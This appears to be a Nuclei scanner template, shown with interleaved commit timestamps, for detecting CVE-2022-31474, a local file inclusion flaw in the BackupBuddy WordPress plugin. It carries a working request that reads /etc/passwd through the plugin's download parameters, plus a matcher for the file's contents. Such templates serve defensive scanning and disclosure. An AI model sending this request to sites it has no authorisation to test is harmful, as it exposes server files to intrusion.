2022-09-11 23:50:52 +00:00
id : CVE-2022-31474
info :
2022-09-16 19:50:10 +00:00
name : BackupBuddy - Local File Inclusion
2022-09-11 23:50:52 +00:00
author : aringo
severity : high
2022-09-16 19:50:10 +00:00
description : BackupBuddy versions 8.5.8.0 - 8.7.4.1 are vulnerable to a local file inclusion vulnerability via the 'download' and 'local-destination-id' parameters.
2022-09-11 23:50:52 +00:00
reference :
2022-09-12 09:17:16 +00:00
- https://www.wordfence.com/blog/2022/09/psa-nearly-5-million-attacks-blocked-targeting-0-day-in-backupbuddy-plugin/
2022-09-11 23:50:52 +00:00
- https://ithemes.com/blog/wordpress-vulnerability-report-special-edition-september-6-2022-backupbuddy
2022-09-12 09:17:16 +00:00
- https://ithemes.com/backupbuddy/
2022-09-12 07:46:11 +00:00
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31474
2022-09-16 19:50:10 +00:00
remediation : Upgrade to at least version 8.7.5 or higher
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score : 7.5
cwe-id : CWE-22
cve-id : CVE-2022-31474
2022-09-12 09:17:16 +00:00
tags : cve,cve2022,wordpress,wp-plugin,wp,lfi,backupbuddy
2022-09-11 23:50:52 +00:00
requests :
- method : GET
path :
- "{{BaseURL}}/wp-admin/admin-post.php?page=pb_backupbuddy_destinations&local-destination-id=/etc/passwd&local-download=/etc/passwd"
2022-09-12 09:17:16 +00:00
2022-09-11 23:50:52 +00:00
matchers-condition : and
matchers :
- type : regex
regex :
- "root:.*:0:0:"
- type : status
status :
- 200
2022-09-16 19:50:10 +00:00
# Enhanced by cs 2022/09/14